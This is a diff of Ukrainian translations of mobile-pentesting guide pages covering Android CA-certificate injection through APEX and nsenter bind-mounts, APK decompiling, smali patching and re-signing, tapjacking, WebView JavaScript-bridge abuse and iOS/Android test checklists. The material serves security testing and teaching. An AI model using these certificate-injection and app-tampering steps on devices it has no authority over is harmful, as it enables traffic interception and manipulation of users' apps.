@ -54,9 +54,9 @@ adb reboot #Now, reboot the machine
Спроби змонтувати **шлях APEX cacerts** як записуваний зазнають невдачі, оскільки система не дозволяє такі операції. Навіть спроби демонтувати або накласти тимчасову файлову систему (tmpfs) на каталог не обходять незмінність; програми продовжують отримувати доступ до оригінальних даних сертифіката, незважаючи на зміни на рівні файлової системи. Ця стійкість зумовлена тим, що **монтаж `/apex`** налаштований з PRIVATE пропагандою, що забезпечує, щоб будь-які зміни в каталозі **`/apex`** не впливали на інші процеси.
Ініціалізація Android включає процес `init`, який, запускаючи операційну систему, також ініціює процес Zygote. Цей процес відповідає за запуск процесів додатків з новим простором монтування, що включає приватний **монтаж `/apex`**, таким чином ізолюючи зміни в цьому каталозі від інших процесів.
Ініціалізація Android включає процес `init`, який, запускаючи операційну систему, також ініціює процес Zygote. Цей процес відповідає за запуск процесів додатків з новим простором монтування, який включає приватний **монтаж `/apex`**, таким чином ізолюючи зміни в цьому каталозі від інших процесів.
Проте існує обхідний шлях для тих, хто потребує змінити сертифікати CA, яким довіряє система, у каталозі **`/apex`**. Це передбачає ручне змонтування **`/apex`** для видалення PRIVATE пропаганди, що робить його записуваним. Процес включає копіювання вмісту **`/apex/com.android.conscrypt`** в інше місце, демонтаж каталогу **`/apex/com.android.conscrypt`** для усунення обмеження на читання, а потім відновлення вмісту на його початкове місце в межах **`/apex`**. Цей підхід вимагає швидких дій, щоб уникнути збоїв системи. Щоб забезпечити загальносистемне застосування цих змін, рекомендується перезапустити `system_server`, що ефективно перезапускає всі програми та приводить систему до узгодженого стану.
Проте існує обхідний шлях для тих, хто потребує змінити сертифікати CA, яким довіряє система, в каталозі **`/apex`**. Це передбачає ручне змонтування **`/apex`** для видалення PRIVATE пропаганди, що робить його записуваним. Процес включає копіювання вмісту **`/apex/com.android.conscrypt`** в інше місце, демонтаж каталогу **`/apex/com.android.conscrypt`** для усунення обмеження на читання, а потім відновлення вмісту на його початкове місце в межах **`/apex`**. Цей підхід вимагає швидких дій, щоб уникнути збоїв системи. Щоб забезпечити застосування цих змін по всій системі, рекомендується перезапустити `system_server`, що ефективно перезапускає всі програми та приводить систему до узгодженого стану.
```bash
# Create a separate temp directory, to hold the current certificates
# Otherwise, when we add the mount we can't read the current certs anymore.
@ -116,16 +116,16 @@ echo "System certificate injected"
```
### Bind-mounting through NSEnter
1. **Налаштування записуваної директорії**: Спочатку створюється записувана директорія шляхом монтування `tmpfs` над існуючою директорією системних сертифікатів, що не є APEX. Це досягається за допомогою наступної команди:
1. **Налаштування записуваної директорії**: Спочатку створюється записувана директорія шляхом монтування `tmpfs` поверх існуючої директорії системних сертифікатів, що не є APEX. Це досягається за допомогою наступної команди:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```
2. **Підготовка CA сертифікатів**: Після налаштування записуваного каталогу, CA сертифікати, які планується використовувати, повинні бути скопійовані в цей каталог. Це може включати копіювання стандартних сертифікатів з `/apex/com.android.conscrypt/cacerts/`. Важливо відповідно налаштувати дозволи та мітки SELinux для цих сертифікатів.
3. **Прив'язка монтування для Zygote**: Використовуючи `nsenter`, входять у простір імен монтування Zygote. Zygote, будучи процесом, відповідальним за запуск Android додатків, вимагає цього кроку, щоб забезпечити, що всі додатки, які будуть ініційовані надалі, використовують новонаконфігуровані CA сертифікати. Використовується команда:
2. **Підготовка CA сертифікатів**: Після налаштування записуваної директорії, CA сертифікати, які планується використовувати, повинні бути скопійовані в цю директорію. Це може включати копіювання стандартних сертифікатів з `/apex/com.android.conscrypt/cacerts/`. Важливо відповідно налаштувати дозволи та мітки SELinux для цих сертифікатів.
3. **Прив'язка для Zygote**: Використовуючи `nsenter`, входять в простір імен монту Zygote. Zygote, будучи процесом, відповідальним за запуск Android додатків, вимагає цього кроку, щоб забезпечити, що всі додатки, які будуть запущені надалі, використовують новонаконфігуровані CA сертифікати. Використовується команда:
```bash
nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
Це забезпечує, що кожен новий додаток, який запускається, буде дотримуватися оновленої конфігурації CA сертифікатів.
Це забезпечує, що кожен новий додаток, який запускається, буде дотримуватись оновленої конфігурації CA сертифікатів.
4. **Застосування змін до запущених додатків**: Щоб застосувати зміни до вже запущених додатків, знову використовується `nsenter`, щоб увійти в простір імен кожного додатку окремо та виконати подібне зв'язування. Необхідна команда:
```bash

2
src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
View File

@ -41,6 +41,6 @@
![](../../images/img12.png)
Нарешті, вам просто потрібно **підписати новий додаток**. [Прочитайте цей розділ сторінки Smali - Decompiling/\[Modifying\]/Compiling, щоб дізнатися, як його підписати](smali-changes.md#sing-the-new-apk).
Нарешті, вам просто потрібно **підписати новий додаток**. [Прочитайте цей розділ сторінки Smali - Декомпіляція/\[Модифікація\]/Компіліція, щоб дізнатися, як його підписати](smali-changes.md#sing-the-new-apk).
{{#include ../../banners/hacktricks-training.md}}

10
src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
View File

@ -21,20 +21,20 @@
## **Динамічний Аналіз у Де-обфускації**
Виконуючи код у контрольованому середовищі, динамічний аналіз **дозволяє спостерігати за тим, як обфускований код поводиться в реальному часі**. Цей метод особливо ефективний для виявлення внутрішніх механізмів складних патернів обфускації, які призначені для приховування справжнього наміру коду.
Виконуючи код у контрольованому середовищі, динамічний аналіз **дозволяє спостерігати, як обфускований код поводиться в реальному часі**. Цей метод особливо ефективний для виявлення внутрішніх механізмів складних патернів обфускації, які призначені для приховування справжнього наміру коду.
### **Застосування Динамічного Аналізу**
- **Дешифрування в Режимі Виконання**: Багато технік обфускації передбачають шифрування рядків або сегментів коду, які дешифруються лише під час виконання. Завдяки динамічному аналізу ці зашифровані елементи можуть бути захоплені в момент дешифрування, розкриваючи їх справжню форму.
- **Ідентифікація Технік Обфускації**: Спостерігаючи за поведінкою програми, динамічний аналіз може допомогти виявити конкретні техніки обфускації, що використовуються, такі як віртуалізація коду, пакувальники або динамічна генерація коду.
- **Виявлення Схованої Функціональності**: Обфускований код може містити приховані функціональності, які не є очевидними лише через статичний аналіз. Динамічний аналіз дозволяє спостерігати за всіма шляхами коду, включаючи ті, що виконуються умовно, щоб виявити такі приховані функціональності.
- **Виявлення Схованої Функціональності**: Обфускований код може містити приховані функціональності, які не є очевидними лише через статичний аналіз. Динамічний аналіз дозволяє спостерігати всі шляхи коду, включаючи ті, що виконуються умовно, щоб виявити такі приховані функціональності.
## Посилання та Додаткове Читання
- [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html)
- BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
- Ця доповідь розглядає реверс-інжиніринг однієї з найскладніших анти-аналізних нативних бібліотек, які я бачив, що використовуються Android-додатком. Вона в основному охоплює техніки обфускації в нативному коді.
- REcon 2019: “The Path to the Payload: Android Edition” \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
- BlackHat USA 2018: “Розпакування упакованого декомпіллятора: Реверс-інжиніринг бібліотеки Android Anti-Analysis” \[[відео](https://www.youtube.com/watch?v=s0Tqi7fuOSU)]
- Ця доповідь охоплює реверс-інжиніринг однієї з найскладніших бібліотек нативного коду для анти-аналізу, які я бачив, що використовуються в Android-додатку. Вона в основному охоплює техніки обфускації в нативному коді.
- REcon 2019: “Шлях до Payload: Android Edition” \[[відео](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)]
- Ця доповідь обговорює серію технік обфускації, виключно в Java-коді, які використовував Android-ботнет для приховування своєї поведінки.
{{#include ../../banners/hacktricks-training.md}}

4
src/mobile-pentesting/android-app-pentesting/react-native-application.md
View File

@ -2,7 +2,7 @@
# Аналіз додатків React Native
Щоб підтвердити, чи був додаток створений на основі фреймворку React Native, виконайте наступні кроки:
Щоб підтвердити, чи був додаток створений на основі фреймворку React Native, виконайте ці кроки:
1. Перейменуйте файл APK з розширенням zip і витягніть його в нову папку, використовуючи команду `cp com.example.apk example-apk.zip` та `unzip -qq example-apk.zip -d ReactNative`.
@ -14,7 +14,7 @@
```html
<script src="./index.android.bundle"></script>
```
Ви можете завантажити файл на [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) або дотримуйтесь цих кроків:
Ви можете завантажити файл на [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) або дотримуватися цих кроків:
1. Відкрийте файл `index.html` у Google Chrome.

18
src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View File

@ -4,41 +4,41 @@
**Для отримання додаткової інформації перегляньте:** [**https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html)
Android додатки можуть використовувати нативні бібліотеки, зазвичай написані на C або C++, для завдань, критичних до продуктивності. Творці шкідливого ПЗ також використовують ці бібліотеки, оскільки їх важче реверсувати, ніж DEX байт-код. Розділ підкреслює навички реверс-інженерії, адаптовані до Android, а не навчання мовам асемблера. Для сумісності надаються версії бібліотек для ARM та x86.
Android додатки можуть використовувати нативні бібліотеки, зазвичай написані на C або C++, для завдань, критичних до продуктивності. Творці шкідливого ПЗ також використовують ці бібліотеки, оскільки їх важче реверсувати, ніж DEX байт-код. У розділі підкреслюються навички реверс-інжинірингу, адаптовані до Android, а не навчання мовам асемблера. Для сумісності надаються версії бібліотек для ARM та x86.
### Ключові моменти:
- **Нативні бібліотеки в Android додатках:**
- Використовуються для завдань, що вимагають високої продуктивності.
- Написані на C або C++, що ускладнює реверс-інженерію.
- Написані на C або C++, що ускладнює реверс-інжиніринг.
- Знаходяться у форматі `.so` (спільний об'єкт), подібно до бінарних файлів Linux.
- Творці шкідливого ПЗ віддають перевагу нативному коду, щоб ускладнити аналіз.
- **Java Native Interface (JNI) та Android NDK:**
- JNI дозволяє реалізовувати Java методи в нативному коді.
- JNI дозволяє реалізовувати методи Java в нативному коді.
- NDK - це набір інструментів, специфічних для Android, для написання нативного коду.
- JNI та NDK з'єднують Java (або Kotlin) код з нативними бібліотеками.
- JNI та NDK з'єднують код Java (або Kotlin) з нативними бібліотеками.
- **Завантаження та виконання бібліотек:**
- Бібліотеки завантажуються в пам'ять за допомогою `System.loadLibrary` або `System.load`.
- JNI_OnLoad виконується під час завантаження бібліотеки.
- Нативні методи, оголошені в Java, пов'язуються з нативними функціями, що дозволяє виконання.
- **Зв'язування Java методів з нативними функціями:**
- **Зв'язування методів Java з нативними функціями:**
- **Динамічне зв'язування:** Імена функцій у нативних бібліотеках відповідають певному шаблону, що дозволяє автоматичне зв'язування.
- **Статичне зв'язування:** Використовує `RegisterNatives` для зв'язування, забезпечуючи гнучкість у найменуванні функцій та структурі.
- **Інструменти та техніки реверс-інженерії:**
- **Інструменти та техніки реверс-інжинірингу:**
- Інструменти, такі як Ghidra та IDA Pro, допомагають аналізувати нативні бібліотеки.
- `JNIEnv` є важливим для розуміння функцій та взаємодій JNI.
- Надані вправи для практики завантаження бібліотек, зв'язування методів та ідентифікації нативних функцій.
### Ресурси:
- **Вивчення ARM асемблера:**
- **Вивчення ARM Assembly:**
- Рекомендується для глибшого розуміння основної архітектури.
- [Основи ARM асемблера](https://azeria-labs.com/writing-arm-assembly-part-1/) від Azeria Labs рекомендовані.
- [Основи ARM Assembly](https://azeria-labs.com/writing-arm-assembly-part-1/) від Azeria Labs рекомендовано.
- **Документація JNI та NDK:**
- [Специфікація JNI від Oracle](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [Поради JNI для Android](https://developer.android.com/training/articles/perf-jni)
- [Початок роботи з NDK](https://developer.android.com/ndk/guides/)
- **Налагодження нативних бібліотек:**
- [Налагодження Android нативних бібліотек за допомогою JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
- [Налагодження нативних бібліотек Android за допомогою JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
{{#include ../../banners/hacktricks-training.md}}

16
src/mobile-pentesting/android-app-pentesting/smali-changes.md
View File

@ -18,7 +18,7 @@
```bash
apktool d APP.apk
```
Якщо **apktool** видає вам будь-яку помилку, спробуйте [встановити **остання версія**](https://ibotpeaches.github.io/Apktool/install/)
Якщо **apktool** видає будь-яку помилку, спробуйте [встановити **остання версія**](https://ibotpeaches.github.io/Apktool/install/)
Деякі **цікаві файли, на які варто звернути увагу**:
@ -26,7 +26,7 @@ apktool d APP.apk
- _AndroidManifest.xml_
- Будь-який файл з розширенням _.sqlite_ або _.db_
Якщо `apktool` має **проблеми з декодуванням програми**, ознайомтеся з [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) або спробуйте використати аргумент **`-r`** (Не декодувати ресурси). Тоді, якщо проблема була в ресурсі, а не в вихідному коді, ви не матимете проблеми (також не декомпілюватимете ресурси).
Якщо `apktool` має **проблеми з декодуванням програми**, ознайомтеся з [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) або спробуйте використати аргумент **`-r`** (Не декодувати ресурси). Тоді, якщо проблема була в ресурсі, а не в вихідному коді, ви не матимете проблеми (також не буде декомпільовано ресурси).
## Зміна коду smali
@ -40,7 +40,7 @@ apktool d APP.apk
## Перекомпіляція APK
Після модифікації коду ви можете **перекомпілювати** код, використовуючи:
Після зміни коду ви можете **перекомпілювати** код, використовуючи:
```bash
apktool b . #In the folder generated when you decompiled the application
```
@ -67,11 +67,11 @@ zipalign -v 4 infile.apk
```
### **Підпишіть новий APK (знову?)**
Якщо ви **надаєте перевагу** використовувати [**apksigner**](https://developer.android.com/studio/command-line/) замість jarsigner, **вам слід підписати apk** після застосування **оптимізації з** zipalign. АЛЕ ЗВЕРНІТЬ УВАГУ, ЩО ВИ МАЄТЕ **ПІДПИСАТИ ЗАСТОСУВАННЯ ТІЛЬКИ ОДИН РАЗ** З jarsigner (перед zipalign) АБО З aspsigner (після zipalign).
Якщо ви **надаєте перевагу** використовувати [**apksigner**](https://developer.android.com/studio/command-line/) замість jarsigner, **вам слід підписати apk** після застосування **оптимізації з** zipalign. АЛЕ ЗВЕРНІТЬ УВАГУ, ЩО ВИ МАЄТЕ **ПІДПИСАТИ ЗАСТОСУВАННЯ ОДИН РАЗ** З jarsigner (перед zipalign) АБО З aspsigner (після zipalign).
```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk
```
## Модифікація Smali
## Зміна Smali
Для наступного коду Hello World на Java:
```java
@ -140,16 +140,16 @@ invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/Strin
Рекомендації:
- Якщо ви збираєтеся використовувати оголошені змінні всередині функції (оголошені v0,v1,v2...) помістіть ці рядки між _.local \<number>_ та оголошеннями змінних (_const v0, 0x1_)
- Якщо ви хочете вставити код логування в середину коду функції:
- Якщо ви хочете вставити код логування в середині коду функції:
- Додайте 2 до кількості оголошених змінних: Наприклад: з _.locals 10_ до _.locals 12_
- Нові змінні повинні бути наступними номерами вже оголошених змінних (в цьому прикладі повинні бути _v10_ та _v11_, пам'ятайте, що починається з v0).
- Змініть код функції логування і використовуйте _v10_ та _v11_ замість _v5_ та _v1_.
### Toasting
Пам'ятайте, щоб додати 3 до кількості _.locals_ на початку функції.
Не забудьте додати 3 до кількості _.locals_ на початку функції.
Цей код підготовлений для вставки в **середину функції** (**змініть** номер **змінних** за необхідності). Він візьме **значення this.o**, **перетворить** його на **String** і потім **зробить** **toast** з його значенням.
Цей код підготовлений для вставки в **середину функції** (**змініть** номер **змінних** за необхідності). Він візьме **значення this.o**, **перетворить** його в **String** і потім **зробить** **toast** з його значенням.
```bash
const/4 v10, 0x1
const/4 v11, 0x1

2
src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
View File

@ -1,6 +1,6 @@
{{#include ../../banners/hacktricks-training.md}}
У ситуаціях, коли застосунок обмежений певними країнами, і ви не можете встановити його на свій Android-пристрій через регіональні обмеження, підробка вашого місцезнаходження на країну, де застосунок доступний, може надати вам доступ. Нижче наведено кроки, як це зробити:
У ситуаціях, коли застосунок обмежений для певних країн, і ви не можете встановити його на свій Android-пристрій через регіональні обмеження, підробка вашого місцезнаходження на країну, де застосунок доступний, може надати вам доступ. Нижче наведено кроки, як це зробити:
1. **Встановіть Hotspot Shield Free VPN Proxy:**

10
src/mobile-pentesting/android-app-pentesting/tapjacking.md
View File

@ -5,11 +5,11 @@
## **Основна інформація**
**Tapjacking** - це атака, коли **шкідлива** **додаток** запускається і **розташовується поверх додатку жертви**. Як тільки він видимо закриває додаток жертви, його інтерфейс користувача спроектований таким чином, щоб обманути користувача взаємодіяти з ним, в той час як він передає взаємодію до додатку жертви.\
В результаті, це **осліплює користувача, не даючи йому знати, що він насправді виконує дії в додатку жертви**.
Таким чином, він **осліплює користувача, не даючи йому знати, що він насправді виконує дії в додатку жертви**.
### Виявлення
Щоб виявити додатки, вразливі до цієї атаки, ви повинні шукати **експортовані активності** в маніфесті android (зверніть увагу, що активність з intent-filter автоматично експортується за замовчуванням). Як тільки ви знайдете експортовані активності, **перевірте, чи потребують вони будь-яких дозволів**. Це пов'язано з тим, що **шкідливий додаток також потребуватиме цього дозволу**.
Щоб виявити додатки, вразливі до цієї атаки, вам слід шукати **експортовані активності** в маніфесті android (зверніть увагу, що активність з intent-filter автоматично експортується за замовчуванням). Як тільки ви знайдете експортовані активності, **перевірте, чи потребують вони будь-яких дозволів**. Це пов'язано з тим, що **шкідливий додаток також потребуватиме цього дозволу**.
### Захист
@ -39,7 +39,7 @@ android:filterTouchesWhenObscured="true">
Найбільш **остання Android програма**, що виконує атаку Tapjacking (+ виклик перед експортованою активністю атакованої програми) можна знайти за адресою: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
Слідкуйте за **інструкціями README для використання**.
Слідуйте **інструкціям README для використання**.
### FloatingWindowApp
@ -52,11 +52,11 @@ android:filterTouchesWhenObscured="true">
Ви можете використовувати [**qark**](https://github.com/linkedin/qark) з параметрами `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk`, щоб створити шкідливу програму для перевірки можливих **Tapjacking** вразливостей.\
Пом'якшення є відносно простим, оскільки розробник може вибрати не отримувати події дотику, коли видимість перекрита іншим. Використовуючи [Android Developers Reference](https://developer.android.com/reference/android/view/View#security):
Пом'якшення є відносно простим, оскільки розробник може вибрати не отримувати події дотику, коли видимість перекрита іншим. Використовуючи [Довідник розробника Android](https://developer.android.com/reference/android/view/View#security):
> Іноді важливо, щоб програма могла перевірити, що дія виконується з повним усвідомленням і згодою користувача, наприклад, надання запиту на дозвіл, здійснення покупки або натискання на рекламу. На жаль, шкідлива програма може спробувати обманути користувача, змусивши його виконати ці дії, не усвідомлюючи цього, приховуючи справжню мету вигляду. Як засіб, фреймворк пропонує механізм фільтрації дотиків, який можна використовувати для підвищення безпеки виглядів, що надають доступ до чутливої функціональності.
>
> Щоб увімкнути фільтрацію дотиків, викликайте [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) або встановіть атрибут макета android:filterTouchesWhenObscured в true. Коли це увімкнено, фреймворк відкине дотики, які отримуються, коли вікно вигляду перекрито іншим видимим вікном. В результаті вигляд не отримає дотики, коли над вікном вигляду з'являється toast, діалог або інше вікно.
> Щоб увімкнути фільтрацію дотиків, викликайте [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) або встановіть атрибут макета android:filterTouchesWhenObscured в true. Коли це увімкнено, фреймворк відкине дотики, які отримуються, коли вікно вигляду перекривається іншим видимим вікном. В результаті вигляд не отримає дотиків, коли над вікном вигляду з'являється toast, діалог або інше вікно.
{{#include ../../banners/hacktricks-training.md}}

8
src/mobile-pentesting/android-app-pentesting/webview-attacks.md
View File

@ -31,7 +31,7 @@
#### **WebViewAssetLoader**
Клас **WebViewAssetLoader** є сучасним підходом для завантаження локальних файлів. Він використовує http(s) URL для доступу до локальних активів і ресурсів, що відповідає політиці Same-Origin, тим самим полегшуючи управління CORS.
Клас **WebViewAssetLoader** є сучасним підходом для завантаження локальних файлів. Він використовує http(s) URL для доступу до локальних активів і ресурсів, узгоджуючись з політикою Same-Origin, що полегшує управління CORS.
### loadUrl
@ -43,8 +43,8 @@ webview.loadUrl("<url here>")
### **Обробка JavaScript та Intent Scheme**
- **JavaScript**: За замовчуванням вимкнено в WebViews, його можна увімкнути за допомогою `setJavaScriptEnabled()`. Рекомендується бути обережним, оскільки увімкнення JavaScript без належних запобіжних заходів може призвести до вразливостей безпеки.
- **Intent Scheme**: WebViews можуть обробляти схему `intent`, що потенційно може призвести до експлуатації, якщо не управляти нею обережно. Приклад вразливості пов'язаний з відкритим параметром WebView "support_url", який може бути використаний для виконання атак міжсайтового скриптингу (XSS).
- **JavaScript**: За замовчуванням вимкнений у WebViews, його можна увімкнути за допомогою `setJavaScriptEnabled()`. Рекомендується бути обережним, оскільки увімкнення JavaScript без належних запобіжних заходів може призвести до вразливостей безпеки.
- **Intent Scheme**: WebViews можуть обробляти схему `intent`, що потенційно може призвести до експлуатації, якщо не управляти нею обережно. Прикладом вразливості є відкритий параметр WebView "support_url", який може бути використаний для виконання атак між сайтами (XSS).
![Vulnerable WebView](<../../images/image (1191).png>)
@ -82,7 +82,7 @@ alert(javascriptBridge.getSecret())
### Виконання віддаленого коду на основі рефлексії (RCE)
- Документований метод дозволяє досягти RCE через рефлексію, виконуючи специфічний payload. Однак анотація `@JavascriptInterface` запобігає несанкціонованому доступу до методів, обмежуючи поверхню атаки.
- Документований метод дозволяє досягти RCE через рефлексію, виконуючи специфічний payload. Однак анотація `@JavascriptInterface` запобігає несанкціонованому доступу до методів, обмежуючи площу атаки.
### Віддалене налагодження

6
src/mobile-pentesting/android-checklist.md
View File

@ -33,10 +33,10 @@
- [ ] Відкриті сервіси
- [ ] Приймачі трансляцій
- [ ] URL-схеми
- [ ] Чи [зберігає програма дані ненадійно всередині або зовні](android-app-pentesting/#insecure-data-storage)?
- [ ] Чи зберігає програма дані ненадійно всередині або зовні](android-app-pentesting/#insecure-data-storage)?
- [ ] Чи є [пароль, закодований або збережений на диску](android-app-pentesting/#poorkeymanagementprocesses)? Чи використовує програма [ненадійні криптоалгоритми](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)?
- [ ] Усі бібліотеки скомпільовані з використанням прапора PIE?
- [ ] Не забувайте, що існує безліч [статичних аналізаторів Android](android-app-pentesting/#automatic-analysis), які можуть дуже допомогти на цьому етапі.
- [ ] Не забувайте, що існує безліч [статичних Android-аналітиків](android-app-pentesting/#automatic-analysis), які можуть дуже допомогти вам на цьому етапі.
### [Динамічний аналіз](android-app-pentesting/#dynamic-analysis)
@ -47,7 +47,7 @@
- [ ] [Вразливі постачальники контенту](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)?
- [ ] [Вразливі відкриті сервіси](android-app-pentesting/#exploiting-services)?
- [ ] [Вразливі приймачі трансляцій](android-app-pentesting/#exploiting-broadcast-receivers)?
- [ ] Чи [передає програма інформацію у відкритому тексті/використовує слабкі алгоритми](android-app-pentesting/#insufficient-transport-layer-protection)? Чи можливий MitM?
- [ ] Чи передає програма [інформацію у відкритому тексті/використовує слабкі алгоритми](android-app-pentesting/#insufficient-transport-layer-protection)? Чи можливий MitM?
- [ ] [Перевірте HTTP/HTTPS трафік](android-app-pentesting/#inspecting-http-traffic)
- [ ] Це дійсно важливо, тому що якщо ви можете захопити HTTP-трафік, ви можете шукати загальні веб-вразливості (Hacktricks має багато інформації про веб-вразливості).
- [ ] Перевірте можливі [ін'єкції на стороні клієнта Android](android-app-pentesting/#android-client-side-injections-and-others) (можливо, деякий статичний аналіз коду допоможе тут)

4
src/mobile-pentesting/cordova-apps.md
View File

@ -4,7 +4,7 @@
**Для отримання додаткової інформації перегляньте [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. Це резюме:
Apache Cordova відомий тим, що дозволяє розробку **гібридних додатків** за допомогою **JavaScript, HTML та CSS**. Він дозволяє створювати додатки для Android та iOS; однак, у нього немає механізму за замовчуванням для захисту вихідного коду додатка. На відміну від React Native, Cordova за замовчуванням не компілює вихідний код, що може призвести до вразливостей через підробку коду. Cordova використовує WebView для рендерингу додатків, що відкриває HTML та JavaScript код навіть після компіляції в APK або IPA файли. React Native, навпаки, використовує JavaScript VM для виконання JavaScript коду, що забезпечує кращий захист вихідного коду.
Apache Cordova відомий тим, що дозволяє розробку **гібридних додатків** за допомогою **JavaScript, HTML та CSS**. Він дозволяє створення додатків для Android та iOS; однак, у нього немає механізму за замовчуванням для захисту вихідного коду додатка. На відміну від React Native, Cordova за замовчуванням не компілює вихідний код, що може призвести до вразливостей через підробку коду. Cordova використовує WebView для рендерингу додатків, що відкриває HTML та JavaScript код навіть після компіляції в APK або IPA файли. React Native, навпаки, використовує JavaScript VM для виконання JavaScript коду, що забезпечує кращий захист вихідного коду.
### Клонування Cordova Додатку
@ -20,7 +20,7 @@ cd bank-new
```
Скопіюйте вміст `bank/assets/www` до `bank-new/www`, виключаючи `cordova_plugins.js`, `cordova.js`, `cordova-js-src/` та директорію `plugins/`.
Вкажіть платформу (Android або iOS) при створенні нового проекту Cordova. Для клонування Android-додатку додайте платформу Android. Зверніть увагу, що версії платформ Cordova та рівні API Android є різними. Ознайомтеся з [документацією](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) Cordova для отримання деталей про версії платформ та підтримувані API Android.
Вкажіть платформу (Android або iOS) при створенні нового проекту Cordova. Для клонування Android-додатку додайте платформу Android. Зверніть увагу, що версії платформ Cordova та рівні API Android є різними. Ознайомтеся з документацією Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) для отримання деталей про версії платформ та підтримувані API Android.
Щоб визначити відповідну версію платформи Cordova Android, перевірте `PLATFORM_VERSION_BUILD_LABEL` у файлі `cordova.js` оригінального додатку.

12
src/mobile-pentesting/ios-pentesting-checklist.md
View File

@ -14,8 +14,8 @@
- [ ] [**Core Data**](ios-pentesting/#core-data) (база даних SQLite) може зберігати чутливу інформацію.
- [ ] [**YapDatabases**](ios-pentesting/#yapdatabase) (база даних SQLite) може зберігати чутливу інформацію.
- [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) неправильна конфігурація.
- [ ] [**Realm бази даних**](ios-pentesting/#realm-databases) можуть зберігати чутливу інформацію.
- [ ] [**Couchbase Lite бази даних**](ios-pentesting/#couchbase-lite-databases) можуть зберігати чутливу інформацію.
- [ ] [**Бази даних Realm**](ios-pentesting/#realm-databases) можуть зберігати чутливу інформацію.
- [ ] [**Бази даних Couchbase Lite**](ios-pentesting/#couchbase-lite-databases) можуть зберігати чутливу інформацію.
- [ ] [**Бінарні куки**](ios-pentesting/#cookies) можуть зберігати чутливу інформацію
- [ ] [**Кешовані дані**](ios-pentesting/#cache) можуть зберігати чутливу інформацію
- [ ] [**Автоматичні знімки**](ios-pentesting/#snapshots) можуть зберігати візуальну чутливу інформацію
@ -40,7 +40,7 @@
- [ ] Перевірте наявність чутливої інформації всередині [**пам'яті додатка**](ios-pentesting/#testing-memory-for-sensitive-data)
### **Слабка криптографія**
### **Пошкоджена криптографія**
- [ ] Перевірте, чи можете ви знайти [**паролі, що використовуються для криптографії**](ios-pentesting/#broken-cryptography)
- [ ] Перевірте використання [**застарілих/слабких алгоритмів**](ios-pentesting/#broken-cryptography) для відправки/зберігання чутливих даних
@ -79,11 +79,11 @@
- [ ] Перевірте, чи може webview **доступатися до локальних файлів** з протоколом **file://** **(**`allowFileAccessFromFileURLs`, `allowUniversalAccessFromFileURLs`)
- [ ] Перевірте, чи може Javascript отримати доступ до **Native** **методів** (`JSContext`, `postMessage`)
### Мережеве спілкування
### Мережева комунікація
- [ ] Виконайте [**MitM для спілкування**](ios-pentesting/#network-communication) і шукайте веб-вразливості.
- [ ] Виконайте [**MitM для комунікації**](ios-pentesting/#network-communication) та шукайте веб-вразливості.
- [ ] Перевірте, чи [**перевіряється ім'я хоста сертифіката**](ios-pentesting/#hostname-check)
- [ ] Перевірте/обійдіть [**Прив'язку сертифікатів**](ios-pentesting/#certificate-pinning)
- [ ] Перевірте/обійдіть [**Прив'язку сертифіката**](ios-pentesting/#certificate-pinning)
### **Різне**

56
src/mobile-pentesting/ios-pentesting/README.md
View File

@ -27,7 +27,7 @@ basic-ios-testing-operations.md
{{#endref}}
> [!NOTE]
> Для наступних кроків **додаток має бути встановлено** на пристрої і вже має бути отримано **IPA файл** додатку.\
> Для наступних кроків **додаток має бути встановлено** на пристрої та вже має бути отримано **IPA файл** додатку.\
> Прочитайте сторінку [Основні Операції Тестування iOS](basic-ios-testing-operations.md), щоб дізнатися, як це зробити.
### Основний Статичний Аналіз
@ -50,7 +50,7 @@ otool -hv <app-binary> | grep PIE # Має включати прапор PIE
- **Stack Canaries**: Для перевірки цілісності стеку, значення «канарки» розміщується на стеку перед викликом функції і перевіряється знову після завершення функції.
```bash
